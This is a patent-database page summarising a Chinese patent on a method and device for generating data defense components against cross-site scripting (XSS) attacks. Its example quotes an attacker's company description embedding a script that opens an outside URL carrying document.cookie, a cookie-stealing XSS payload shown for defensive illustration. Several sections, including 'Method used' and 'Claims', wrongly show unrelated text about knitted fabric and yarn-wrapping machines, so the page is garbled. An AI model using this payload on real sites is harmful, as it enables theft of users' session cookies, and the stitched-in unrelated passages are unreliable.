Looking for breakthrough ideas for innovation challenges? Try Patsnap Eureka!

Method and device for generating data defense components for actively defending against xss attacks

A component and data technology, which is applied in the field of a data defense component generation method and an apparatus for actively defending against XSS attacks, can solve problems such as inability to effectively defend against XSS attacks, website visitor threats, and inability to actively defend against XSS attacks, thereby improving development efficiency , improve safety, reduce investment effect

Inactive Publication Date: 2015-11-18
百卓网络科技有限公司
View PDF6 Cites 0 Cited by
  • Summary
  • Abstract
  • Description
  • Claims
  • Application Information

AI Technical Summary

Problems solved by technology

Because this method implants the analysis module and the XSS information database into the local computer, it is necessary to keep updating the XSS database from time to time, otherwise it cannot effectively defend against new XSS attacks, and this defense method is a passive defense, and the XSS information database is updated The time difference may lead to the success of XSS attacks, so you cannot take the initiative to defend
[0006] For large websites, the number of daily visits is quite large. If you cannot actively defend against XSS attacks in advance and leave them to deal with them after the event, it will pose a potential threat to website visitors.

Method used

the structure of the environmentally friendly knitted fabric provided by the present invention; figure 2 Flow chart of the yarn wrapping machine for environmentally friendly knitted fabrics and storage devices; image 3 Is the parameter map of the yarn covering machine
View more

Image

Smart Image Click on the blue labels to locate them in the text.
Viewing Examples
Smart Image
  • Method and device for generating data defense components for actively defending against xss attacks
  • Method and device for generating data defense components for actively defending against xss attacks
  • Method and device for generating data defense components for actively defending against xss attacks

Examples

Experimental program
Comparison scheme
Effect test

example

[0092] In a website, registered users are allowed to enter their company introduction and product introduction for Internet promotion. In this case, malicious attackers are likely to embed XSS attack codes in the company introduction information or product introduction information.

[0093] For example, in Company Description enter:

[0094] "In 1996, the company started in Nanjing. For 15 years, it has always been adhering to the service concept of "providing customers with high-quality services". Can not live up to this trust and help customers achieve business success.

[0095] window.open('http: / / www.aabb.net / cookie.asp?msg='+document.cookie)

[0096] Today, as the largest private enterprise in China, the company still maintains an attitude of forging ahead and focusing on quality, and always adheres to independent development, cost optimization, and measures such as strengthening talent strategy and technological innovation to create a more optimized network and standar...

the structure of the environmentally friendly knitted fabric provided by the present invention; figure 2 Flow chart of the yarn wrapping machine for environmentally friendly knitted fabrics and storage devices; image 3 Is the parameter map of the yarn covering machine
Login to View More

PUM

No PUM Login to View More

Abstract

The invention discloses a method and a device for generating a data defense assembly for actively defending XSS (Cross Site Script) attack. The method comprises the following steps of forming a simple data transmission target and adding a defense mark; customizing a defense compiler assembly code; inserting the defense compiler assembly code into a standard compiler assembly sequence; and forming the data defense assembly. The device comprises a data structure reading module, a defense code identifying module, a defense compiler, a standard compiler and a defense code management module, wherein the data structure reading module, the defense code identifying module, the defense compiler and the standard compiler are connected in sequence; and the defense code management module is connected with the defense compiler. By utilizing the method and the device, the defense code can be adjusted and expanded in time, so that a website can rapidly defend constantly changed XSS attack in real time. According to the method and the device, the generality is strong, the development efficiency of the website is greatly improved, and the security of the website is improved.

Description

technical field [0001] The invention belongs to the field of website security, in particular to a method and device for generating a data defense component for actively defending against XSS attacks. Background technique [0002] Among various website security vulnerabilities, cross-site scripting attacks (CrossSiteScript, XSS attacks) are more serious. Cross-site scripting attack means that attackers insert malicious executable scripts (including javascript, flash, css, etc.) into vulnerable websites to trick users into executing them. Once the user browses this page, the malicious script embedded in it will be executed. In this way, the attacker can maliciously endanger the user, such as stealing various user accounts and controlling corporate data, including functions that can be read, tampered, added, and deleted. The ability of sensitive data of enterprises, theft of important and commercially valuable information of enterprises, illegal transfer of funds, forced sendi...

Claims

the structure of the environmentally friendly knitted fabric provided by the present invention; figure 2 Flow chart of the yarn wrapping machine for environmentally friendly knitted fabrics and storage devices; image 3 Is the parameter map of the yarn covering machine
Login to View More

Application Information

Patent Timeline
no application Login to View More
Patent Type & Authority Patents(China)
IPC IPC(8): G06F21/56G06F17/30H04L29/06
Inventor 杨昕葛亮
Owner 百卓网络科技有限公司
Who we serve
  • R&D Engineer
  • R&D Manager
  • IP Professional
Why Patsnap Eureka
  • Industry Leading Data Capabilities
  • Powerful AI technology
  • Patent DNA Extraction
Social media
Patsnap Eureka Blog
Learn More
PatSnap group products

Browse by: Latest US Patents, China's latest patents, Technical Efficacy Thesaurus, Application Domain, Technology Topic, Popular Technical Reports.

© 2024 PatSnap. All rights reserved.Legal|Privacy policy|Modern Slavery Act Transparency Statement|Sitemap|About US| Contact US: help@patsnap.com